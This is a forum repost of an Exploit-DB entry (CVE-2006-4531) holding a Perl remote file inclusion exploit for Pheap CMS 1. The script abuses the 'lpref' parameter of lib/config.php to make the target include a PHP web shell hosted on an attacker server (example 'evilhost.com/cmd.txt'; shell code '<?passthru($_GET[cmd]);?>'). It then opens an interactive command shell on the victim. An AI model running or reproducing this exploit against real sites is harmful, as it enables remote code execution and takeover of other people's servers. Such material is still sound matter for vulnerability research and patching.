- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2281
- Проверка EDB
-
- Пройдено
- Автор
- KACPER
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-4531
- Дата публикации
- 2006-08-31
Код:
#!/usr/bin/perl
use LWP::UserAgent;
#/*
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- - - [DEVIL TEAM THE BEST POLISH TEAM] - -
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- Pheap CMS <= 1 (lpref) Remote File Include Exploit
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- [Script name: Pheap CMS v. 1
#- [Script site: http://pheap.barekoncept.com/
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- Find by: Kacper (a.k.a Rahim)
#+
#- Contact: [email protected]
#- or
#- http://www.rahim.webd.pl/
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- Special Greetz: DragonHeart ;-)
#- Ema: Leito, Leon, Adam, DeathSpeed, Drzewko, pepi, mivus ;]
#-
#!@ Przyjazni nie da sie zamienic na marne korzysci @!
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- Z Dedykacja dla osoby,
#- bez ktorej nie mogl bym zyc...
#- K.C:* J.M (a.k.a Magaja)
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# usage:
# perl exploit.pl <Pheap Locaction> <shell location> <shell cmd>
#
# perl exploit.pl http://site.com/[Pheap_Path]/ http://site.com/cmd.txt cmd
#
# cmd shell example: <?passthru($_GET[cmd]);?>
#
# cmd shell variable: ($_GET[cmd]);
###################################################
#
# in config.php line 13:
#....
# include($lpref."lib/globals.php");
#....
###################################################
$sciezka = $ARGV[0];
$sciezkacmd = $ARGV[1];
$komenda = $ARGV[2];
if($sciezka!~/http:\/\// || $sciezkacmd!~/http:\/\// || !$komenda){usage()}
head();
while()
{
print "[shell] \$";
while(<STDIN>)
{
$cmd=$_;
chomp($cmd);
$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET=>$sciezka.'lib/config.php?lpref='.$sciezkacmd.'?&'.$komenda.'='.$cmd)or die "\nCouldNot connect\n";
$res = $xpl->request($req);
$return = $res->content;
$return =~ tr/[\n]/[ê]/;
if (!$cmd) {print "\nEnter a Command\n\n"; $return ="";}
elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot executea blank command in <b>/)
{print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
elsif ($return =~/^<br.\/>.<b>Warning/) {print "\nInvalid Command\n\n"}
if($return =~ /(.+)<br.\/>.<b>Warning.(.+)<br.\/>.<b>Warning/)
{
$finreturn = $1;
$finreturn=~ tr/[ê]/[\n]/;
print "\r\n$finreturn\n\r";
last;
}
else {print "[shell] \$";}}}last;
sub head()
{
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
print "+ - - [DEVIL TEAM THE BEST POLISH TEAM] - - +\n";
print "+ Pheap CMS <= 1 (lpref) Remote File Include Exploit +\n";
print "+ http://www.rahim.webd.pl/ +\n";
print "+ Find by: Kacper (a.k.a Rahim) +\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
}
sub usage()
{
head();
print " Usage: perl exploit.pl <Pheap Locaction> <shell location> <shell cmd>\r\n\n";
print " <Pheap Locaction> - Full path to Pheap ex: http://www.site.com/Pheap/\r\n";
print " <shell location> - Path to cmd Shell e.g http://www.evilhost.com/cmd.txt\r\n";
print " <shell cmd> - Command variable used in php shell \r\n";
print " ============================================================================\r\n";
print " Find by: Kacper (a.k.a Rahim) \r\n";
print " http://www.rahim.webd.pl/ \r\n";
print " Special Greetz: DragonHeart ;-) \r\n";
print " ============================================================================\r\n";
exit();
}
#Pozdrawiam wszystkich ;-)
# milw0rm.com [2006-08-31]
- Источник
- www.exploit-db.com